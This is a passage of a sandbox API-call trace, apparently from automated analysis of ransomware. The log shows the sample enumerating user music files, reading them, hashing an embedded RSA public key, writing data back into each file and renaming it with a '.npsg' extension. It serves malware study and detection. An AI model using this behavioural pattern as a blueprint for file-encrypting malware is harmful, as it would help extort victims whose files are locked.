RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x340dd38 [0238.094] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373548 [0238.094] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373528 [0238.094] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x6affc0 [0238.094] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0238.094] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0238.094] GetCurrentThreadId () returned 0x5b4 [0238.094] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0238.094] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0238.094] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x33c2ee8 [0238.094] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0238.094] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0238.094] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0238.095] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0238.095] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c2ee8 | out: hHeap=0x620000) returned 1 [0238.095] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x33c2ee8 [0238.095] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373548 | out: hHeap=0x620000) returned 1 [0238.095] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4c) returned 0x33c5148 [0238.095] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373548 [0238.095] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x33adda8 [0238.095] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373598 [0238.095] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400908 [0238.095] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0238.095] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373598 [0238.095] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373538 [0238.095] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373568 [0238.095] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x6822f0 [0238.095] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x6822e0 [0238.095] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f8e8 [0238.095] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f8f8 [0238.095] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x34008a8 [0238.095] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373538 | out: hHeap=0x620000) returned 1 [0238.095] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373538 [0238.095] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0238.096] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373598 [0238.096] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f908 [0238.096] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f918 [0238.096] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f928 [0238.096] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x34008c0 [0238.096] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f918 | out: hHeap=0x620000) returned 1 [0238.096] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x33c8780 [0238.096] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f908 | out: hHeap=0x620000) returned 1 [0238.096] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400890 [0238.096] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f928 | out: hHeap=0x620000) returned 1 [0238.096] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3400920 [0238.096] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0238.096] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373598 [0238.096] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f8e8 | out: hHeap=0x620000) returned 1 [0238.096] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x34008f0 [0238.096] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0238.096] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x34008d8 [0238.096] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373568 | out: hHeap=0x620000) returned 1 [0238.096] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3400938 [0238.096] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34008d8 | out: hHeap=0x620000) returned 1 [0238.096] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x34008d8 [0238.096] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34008f0 | out: hHeap=0x620000) returned 1 [0238.096] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373568 [0238.097] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373548 | out: hHeap=0x620000) returned 1 [0238.097] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c8800 [0238.097] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373568 | out: hHeap=0x620000) returned 1 [0238.097] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x33fd4c8 [0238.097] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34008a8 | out: hHeap=0x620000) returned 1 [0238.097] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x34008a8 [0238.097] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373538 | out: hHeap=0x620000) returned 1 [0238.097] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x204) returned 0x3b90810 [0238.097] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400908 | out: hHeap=0x620000) returned 1 [0238.097] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x3b7ba60 [0238.097] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400938 | out: hHeap=0x620000) returned 1 [0238.097] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x210) returned 0x3b94b10 [0238.097] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0238.097] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10c) returned 0x3b7b830 [0238.097] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6822f0 | out: hHeap=0x620000) returned 1 [0238.097] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x3b7b948 [0238.097] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34008a8 | out: hHeap=0x620000) returned 1 [0238.097] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x200) returned 0x346fa10 [0238.097] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7ba60 | out: hHeap=0x620000) returned 1 [0238.098] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x64dd08 [0238.098] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373528 | out: hHeap=0x620000) returned 1 [0238.098] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a770 | out: hHeap=0x620000) returned 1 [0238.098] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c2ee8 | out: hHeap=0x620000) returned 1 [0238.098] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64dd08 | out: hHeap=0x620000) returned 1 [0238.098] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c8800 | out: hHeap=0x620000) returned 1 [0238.098] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7b948 | out: hHeap=0x620000) returned 1 [0238.098] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b94b10 | out: hHeap=0x620000) returned 1 [0238.098] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x346fa10 | out: hHeap=0x620000) returned 1 [0238.098] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7b830 | out: hHeap=0x620000) returned 1 [0238.098] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6822e0 | out: hHeap=0x620000) returned 1 [0238.098] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34008d8 | out: hHeap=0x620000) returned 1 [0238.098] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f8f8 | out: hHeap=0x620000) returned 1 [0238.098] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400920 | out: hHeap=0x620000) returned 1 [0238.098] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c8780 | out: hHeap=0x620000) returned 1 [0238.098] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34008c0 | out: hHeap=0x620000) returned 1 [0238.098] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400890 | out: hHeap=0x620000) returned 1 [0238.098] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x340dd38 | out: hHeap=0x620000) returned 1 [0238.098] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c19c8 | out: hHeap=0x620000) returned 1 [0238.098] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6affc0 | out: hHeap=0x620000) returned 1 [0238.098] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400878 | out: hHeap=0x620000) returned 1 [0238.099] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3409950 | out: hHeap=0x620000) returned 1 [0238.099] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b90810 | out: hHeap=0x620000) returned 1 [0238.099] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33adda8 | out: hHeap=0x620000) returned 1 [0238.099] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c5148 | out: hHeap=0x620000) returned 1 [0238.099] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7bb78 | out: hHeap=0x620000) returned 1 [0238.099] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c87a0 | out: hHeap=0x620000) returned 1 [0238.099] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373588 | out: hHeap=0x620000) returned 1 [0238.099] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c87c0 | out: hHeap=0x620000) returned 1 [0238.099] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33ecc28 | out: hHeap=0x620000) returned 1 [0238.099] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7aa18 | out: hHeap=0x620000) returned 1 [0238.099] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1920 | out: hHeap=0x620000) returned 1 [0238.099] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7a830 | out: hHeap=0x620000) returned 1 [0238.099] WriteFile (in: hFile=0x644, lpBuffer=0x3b83cd0*, nNumberOfBytesToWrite=0x1258, lpNumberOfBytesWritten=0x39afb14, lpOverlapped=0x0 | out: lpBuffer=0x3b83cd0*, lpNumberOfBytesWritten=0x39afb14*=0x1258, lpOverlapped=0x0) returned 1 [0238.099] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b83cd0 | out: hHeap=0x620000) returned 1 [0238.099] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0x125d, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0238.099] WriteFile (in: hFile=0x644, lpBuffer=0x33b8188*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x33b8188*, lpNumberOfBytesWritten=0x39afb50*=0x100, lpOverlapped=0x0) returned 1 [0238.100] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33b8188 | out: hHeap=0x620000) returned 1 [0238.100] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7ca38 [0238.100] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x428) returned 0x346fa10 [0238.100] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="A9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1", cchWideChar=-1, lpMultiByteStr=0x346fa10, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="A9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1", lpUsedDefaultChar=0x0) returned 41 [0238.100] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x430) returned 0x3b83cd0 [0238.100] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x346fa10 | out: hHeap=0x620000) returned 1 [0238.100] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7ca38 | out: hHeap=0x620000) returned 1 [0238.100] WriteFile (in: hFile=0x644, lpBuffer=0x3b83cd0*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x3b83cd0*, lpNumberOfBytesWritten=0x39afb50*=0x28, lpOverlapped=0x0) returned 1 [0238.100] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b83cd0 | out: hHeap=0x620000) returned 1 [0238.100] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0238.100] WriteFile (in: hFile=0x644, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39afb50*=0x26, lpOverlapped=0x0) returned 1 [0238.100] CloseHandle (hObject=0x644) returned 1 [0238.101] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64e728 [0238.101] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8a0) returned 0x3b83cd0 [0238.101] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64e728 | out: hHeap=0x620000) returned 1 [0238.102] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ZmlmXoAngk\\fHTJAvELPoS-vEpQO.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\zmlmxoangk\\fhtjavelpos-vepqo.wav"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ZmlmXoAngk\\fHTJAvELPoS-vEpQO.wav.npsg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\zmlmxoangk\\fhtjavelpos-vepqo.wav.npsg")) returned 1 [0238.102] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b83cd0 | out: hHeap=0x620000) returned 1 [0238.102] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0238.103] VirtualFree (lpAddress=0x39f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0238.104] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64e690 | out: hHeap=0x620000) returned 1 [0238.104] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x66790090, ftCreationTime.dwHighDateTime=0x1d5bd5a, ftLastAccessTime.dwLowDateTime=0x2568c610, ftLastAccessTime.dwHighDateTime=0x1d5c432, ftLastWriteTime.dwLowDateTime=0x2568c610, ftLastWriteTime.dwHighDateTime=0x1d5c432, nFileSizeHigh=0x0, nFileSizeLow=0x102bd, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="mdTm586GgYHzCN.mp3", cAlternateFileName="MDTM58~1.MP3")) returned 1 [0238.104] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7ca38 [0238.104] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64e690 [0238.104] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7ca38 | out: hHeap=0x620000) returned 1 [0238.104] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ZmlmXoAngk\\mdTm586GgYHzCN.mp3") returned=".mp3" [0238.104] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ZmlmXoAngk\\mdTm586GgYHzCN.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\zmlmxoangk\\mdtm586ggyhzcn.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x644 [0238.106] GetFileSizeEx (in: hFile=0x644, lpFileSize=0x39afb40 | out: lpFileSize=0x39afb40*=66237) returned 1 [0238.106] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x39f0000 [0238.109] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0x10297, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0238.109] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39afb78, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb78*=0x26, lpOverlapped=0x0) returned 1 [0238.110] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1990 [0238.111] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0238.111] SetFilePointer (in: hFile=0x644, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0238.111] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39afb70, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb70*=0x102bd, lpOverlapped=0x0) returned 1 [0238.112] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0238.112] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1da) returned 0x3b7a830 [0238.112] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0238.112] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0238.112] CryptAcquireContextW (in: phProv=0x39afa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39afa50*=0x67a770) returned 1 [0238.113] CryptCreateHash (in: hProv=0x67a770, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39afa58 | out: phHash=0x39afa58) returned 1 [0238.113] CryptHashData (hHash=0x33f0408, pbData=0x3b7a830, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0238.113] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39afa54) returned 1 [0238.113] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x33c87a0 [0238.113] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x33c87a0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x33c87a0, pdwDataLen=0x39afa54) returned 1 [0238.113] GetLastError () returned 0x0 [0238.114] CryptDestroyHash (hHash=0x33f0408) returned 1 [0238.114] CryptReleaseContext (hProv=0x67a770, dwFlags=0x0) returned 1 [0238.114] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7a830 | out: hHeap=0x620000) returned 1 [0238.114] UuidCreate (in: Uuid=0x39afa48 | out: Uuid=0x39afa48) returned 0x0 [0238.114] UuidToStringA (in: Uuid=0x39afa48, StringUuid=0x39afa40 | out: StringUuid=0x39afa40) returned 0x0 [0238.114] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1920 [0238.114] RpcStringFreeA (in: String=0x39afa40 | out: String=0x39afa40) returned 0x0 [0238.114] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0238.114] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1990 [0238.114] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x102c0) returned 0x3b95d50 [0238.114] SetFilePointer (in: hFile=0x644, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0238.114] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1920 | out: hHeap=0x620000) returned 1 [0238.115] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1e0) returned 0x3b7a830 [0238.115] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1920 [0238.115] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1e0) returned 0x3b7aa18 [0238.115] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x33ecc28 [0238.115] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3409950 [0238.115] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400878 [0238.115] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3409998 [0238.115] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400890 [0238.115] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x34008c0 [0238.115] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400920 [0238.115] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x34008d8 [0238.115] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x33f8198 [0238.115] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x158) returned 0x3b7fce8 [0238.115] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x3b7fce8, Size=0x218) returned 0x3b90810 [0238.115] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x346fa10 [0238.115] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34008c0 | out: hHeap=0x620000) returned 1 [0238.115] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34008d8 | out: hHeap=0x620000) returned 1 [0238.115] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400920 | out: hHeap=0x620000) returned 1 [0238.115] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33f8198 | out: hHeap=0x620000) returned 1 [0238.115] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x346fa10 | out: hHeap=0x620000) returned 1 [0238.115] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400920 [0238.116] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373588 [0238.116] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x34008d8 [0238.116] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x33c87c0 [0238.116] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x34008c0 [0238.116] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373528 [0238.116] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x3b7bb78 [0238.116] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0238.116] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x33ecb68 [0238.116] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c87a0 [0238.116] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x3b7b830 [0238.116] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c8780 [0238.116] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373538 [0238.116] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7bb78 | out: hHeap=0x620000) returned 1 [0238.116] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34008d8 | out: hHeap=0x620000) returned 1 [0238.116] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373528 | out: hHeap=0x620000) returned 1 [0238.116] HeapFree (in: hHeap=0x620000, dwFlags=0x0, 